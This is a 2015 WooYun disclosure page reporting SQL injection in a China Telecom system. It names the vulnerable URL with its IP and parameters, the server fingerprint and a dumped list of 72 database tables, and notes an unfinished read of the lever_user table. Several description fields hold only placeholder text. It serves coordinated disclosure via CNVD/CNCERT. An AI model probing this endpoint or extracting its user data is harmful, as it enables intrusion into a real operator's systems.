当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125860

漏洞标题:中国电信某系统SQL注入

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-07-10 11:40

修复时间:2015-08-28 18:00

公开时间:2015-08-28 18:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

泰斯特

详细说明:

http://61.191.47.101:80/frame/InitBindDrop?type=2&father=11


1-1.jpg


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11
Database: LEVERROUTER
[72 tables]
+------------------------------+
| advert |
| alipayorder |
| base_file |
| base_interfacemanage |
| base_interfacemanagedetails |
| base_news |
| billcard |
| blackandwhite |
| business_circle |
| business_info |
| businessadvert |
| businessadvert_copy |
| clienttype |
| crm_order |
| firmwarefile |
| hmvisit |
| knowledgebase |
| lever_appendproperty |
| lever_appendpropertyinstance |
| lever_button |
| lever_datapermission |
| lever_employee |
| lever_exception |
| lever_interfaceaccess |
| lever_ipblacklist |
| lever_itemdetails |
| lever_items |
| lever_organization |
| lever_rolemenu |
| lever_rolemenubutton |
| lever_roles |
| lever_shortcut |
| lever_stafforganize |
| lever_syslogdetails |
| lever_sysloginlog |
| lever_syslogs |
| lever_sysmenu |
| lever_sysmenubutton |
| lever_tablecolumns |
| lever_user |
| lever_usermenu |
| lever_usermenubutton |
| lever_userrole |
| leverspecauth |
| loginmodel |
| mbtongji |
| navigateurl |
| networking |
| notice |
| noticereader |
| onlineuser |
| operater |
| orderbase |
| portaladv |
| portaltemplate |
| pt_user |
| roms |
| routeinfo |
| smslog |
| smssendlog |
| smstemplate |
| system_area |
| system_city |
| system_province |
| systemlogo |
| terminal |
| terminalapply |
| thirdparty |
| valcode |
| visitdetail |
| visitlegalizelog |
| visituser |
+------------------------------+


尝试读取lever_user表内容,显示3068个返回,暂未跑完数据

1-4.jpg


漏洞证明:

泰斯特

修复方案:

泰斯特

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-14 17:59

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论